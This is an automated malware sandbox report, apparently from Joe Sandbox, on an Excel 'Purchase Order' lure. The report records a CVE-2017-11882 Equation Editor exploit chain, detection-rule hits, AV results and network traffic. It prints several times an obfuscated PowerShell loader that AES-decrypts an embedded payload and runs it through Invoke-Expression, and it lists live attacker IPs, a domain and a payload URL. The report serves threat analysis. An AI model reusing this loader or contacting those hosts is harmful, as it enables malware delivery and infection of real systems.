u/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2900, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , ProcessId: 3284, ProcessName: wscript.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2900, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , ProcessId: 3284, ProcessName: wscript.exe
    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2900, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2900, Protocol: tcp, SourceIp: 188.114.97.3, SourceIsIpv6: false, SourcePort: 80
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2900, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , ProcessId: 3284, ProcessName: wscript.exe
    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2900, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2304, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3332, TargetFilename: C:\Users\user\AppData\Local\Temp\ut5f2lnb.oif.ps1
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: http://198.46.176.133/Upload/vbs.jpegAvira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesimplethingstobeunderstandeverythingverygreattoseetheatallfinetogetmebackwithentirethings________youreallyhappeyseeyou[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC991353.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8FE04F55-A836-48BD-93EE-A3A590DB0015}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
    Source: Purchase Order.xlsReversingLabs: Detection: 28%
    Source: Purchase Order.xlsJoe Sandbox ML: detected

    Exploits

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 172.245.123.11 Port: 80Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
    Source: ~WRF{8FE04F55-A836-48BD-93EE-A3A590DB0015}.tmp.4.drStream path '_1783847634/\x1CompObj' : ...................F....Microsoft Equation 3.0....
    Source: ~WRF{8FE04F55-A836-48BD-93EE-A3A590DB0015}.tmp.4.drStream path '_1783847639/\x1CompObj' : ...................F....Microsoft Equation 3.0....
    Source: ~WRF{8FE04F55-A836-48BD-93EE-A3A590DB0015}.tmp.4.drStream path '_1783847660/\x1CompObj' : ...................F....Microsoft Equation 3.0....
    Source: ~WRF{8FE04F55-A836-48BD-93EE-A3A590DB0015}.tmp.4.drStream path '_1783847661/\x1CompObj' : ...................F....Microsoft Equation 3.0....
    Source: ~WRF{8FE04F55-A836-48BD-93EE-A3A590DB0015}.tmp.4.drStream path '_1783847664/\x1CompObj' : ...................F....Microsoft Equation 3.0....
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: System.pdbosoft.NET\Framework\v4.0.30319;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;%SystemRoot%\system32\WindowsPowerShell\v1.0\;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\W source: powershell.exe, 0000000A.00000002.538261113.0000000000329000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: :\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000A.00000002.538261113.0000000000363000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdb source: powershell.exe, 0000000A.00000002.539433038.000000000515E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: G??\C:\Windows\System.pdbpdbtem.pdbGAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb.Core.pdb\System.Management.Automation.pdbW source: powershell.exe, 0000000A.00000002.538261113.000000000035D000.00000004.00000020.00020000.00000000.sdmp

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: global trafficDNS query: name: tny.wtf
    Source: global trafficDNS query: name: tny.wtf
    Source: global trafficDNS query: name: tny.wtf
    Source: global trafficDNS query: name: tny.wtf
    Source: global trafficDNS query: name: tny.wtf
    Source: global trafficDNS query: name: tny.wtf
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.176.133:80
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.176.133:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49162
